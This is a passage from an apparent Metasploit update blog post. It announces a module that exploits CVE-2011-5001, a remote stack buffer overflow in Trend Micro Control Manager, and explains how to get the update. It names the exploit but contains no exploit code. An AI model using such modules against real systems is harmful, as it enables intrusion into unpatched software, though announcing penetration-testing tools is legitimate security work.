  • trendmicro_cmdprocessor_addtask : Exploits CVE-2011-5001, a remote stack buffer overflow in TrendMicro's Control Manager. It's always fun to exploit buffer overflows in security software.

 

Availability

 

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

 

For additional details on what's changed and what's current, please see Jonathan Cran's most excellent release notes.

Filter Blog

By date: By tag: